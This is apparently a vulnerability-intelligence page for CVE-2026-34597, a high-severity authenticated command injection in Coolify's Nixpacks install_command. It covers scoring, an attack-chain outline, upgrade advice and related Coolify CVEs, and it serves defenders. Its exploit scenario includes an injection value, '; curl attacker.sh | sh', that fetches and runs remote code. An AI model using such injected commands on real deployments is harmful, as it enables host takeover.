Skip to main content

Coolify EUVDEUVD-2026-40224

| CVE-2026-34597 HIGH
OS Command Injection (CWE-78)
2026-06-29 GitHub_M
8.8
CVSS 3.1 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
8.8 HIGH

Network-reachable web UI (AV:N) with simple injection (AC:L) by an authenticated config-capable user (PR:L) yields host RCE with full C/I/A impact.

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Patch available
Jun 29, 2026 - 22:02 EUVD
Analysis Generated
Jun 29, 2026 - 21:15 vuln.today

DescriptionCVE.org

Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to 4.0.0-beta.470, a critical Authenticated Host Remote Code Execution (RCE) vulnerability was discovered in Coolify. The flaw resides in the handling of user-defined build parameters for the Nixpacks build pack. Specifically, the install_command provided by a user is directly concatenated into a shell command string that is executed on the deployment host during the building phase. An attacker can leverage this to escape the intended build context and execute arbitrary commands with host-level privileges. This vulnerability is fixed in 4.0.0-beta.470.

AnalysisAI

Authenticated remote code execution in Coolify (self-hosted PaaS) before 4.0.0-beta.470 lets a low-privileged authenticated user run arbitrary commands on the deployment host. The flaw is an OS command injection in the Nixpacks build pack: the user-supplied install_command build parameter is concatenated unsanitized into a shell command executed during the build phase, allowing escape from the build context to host-level command execution. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate to Coolify panel
Delivery
Create/edit Nixpacks deployment
Exploit
Inject shell metacharacters into install_command
Execution
Trigger build phase
Persist
Command executes on deployment host
Impact
Host-level RCE achieved

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated Coolify account (CVSS PR:L) with permission to configure a deployment, and the target application must use the Nixpacks build pack where the attacker can set the install_command build parameter. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 base score is 8.8 (High) with vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, indicating network-reachable, low-complexity exploitation requiring only low privileges and no user interaction, with full confidentiality/integrity/availability impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with a low-privileged Coolify account (for example, a developer on a shared instance) creates or edits an application configured to build with Nixpacks and sets the install_command to a value containing shell metacharacters such as `; curl attacker.sh | sh`. When the deployment build runs, the injected command executes on the deployment host with the build process's privileges, giving the attacker command execution beyond the intended build sandbox. …
Remediation Upgrade to the patched release Coolify 4.0.0-beta.470, which contains the fix (Vendor-released patch: 4.0.0-beta.470); see the advisory at https://github.com/coollabsio/coolify/security/advisories/GHSA-9pp4-wcmj-rq73. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Audit all Coolify instances to confirm versions and restrict build configuration permissions to administrators only; disable Nixpacks builds if not actively required. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2025-59157 CRITICAL POC
9.9 Jan 05

Coolify, a self-hosted server management platform, allows authenticated users to inject OS commands through the Git Repo

CVE-2025-66209 CRITICAL POC
9.9 Dec 23

A command injection vulnerability in Coolify's Database Backup functionality allows authenticated users with application

CVE-2025-64420 CRITICAL POC
9.9 Jan 05

Coolify through v4.0.0-beta.434 exposes the root user's SSH private key to low-privileged team members. Any user with ba

CVE-2026-57498 CRITICAL POC
9.6 Jun 29

Cross-team authorization bypass in Coolify (open-source self-hosted PaaS) before 4.0.0-beta.474 allows an authenticated,

CVE-2025-64419 CRITICAL POC
9.6 Jan 05

Coolify before 4.0.0-beta.445 allows command injection through docker-compose.yaml parameters. If a victim creates an ap

CVE-2026-34594 HIGH POC
8.8 Jun 29

Authenticated OS command injection in Coolify before 4.0.0-beta.471 lets any user holding destination management permiss

CVE-2025-64424 HIGH POC
8.8 Jan 05

Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. [CVSS 8.8 HIGH]

CVE-2025-59156 HIGH POC
8.8 Jan 05

Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0

CVE-2025-66211 HIGH POC
8.8 Dec 23

An authenticated command injection vulnerability in Coolify's PostgreSQL initialization script handling allows attackers

CVE-2025-66210 HIGH POC
8.8 Dec 23

A command injection vulnerability in Coolify's Database Import functionality allows authenticated users with application

CVE-2025-66213 HIGH POC
8.8 Dec 23

An authenticated command injection vulnerability in Coolify's File Storage Directory Mount Path functionality allows use

CVE-2025-66212 HIGH POC
8.8 Dec 23

An authenticated command injection vulnerability in Coolify's Dynamic Proxy Configuration Filename handling allows users

Share

EUVD-2026-40224 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy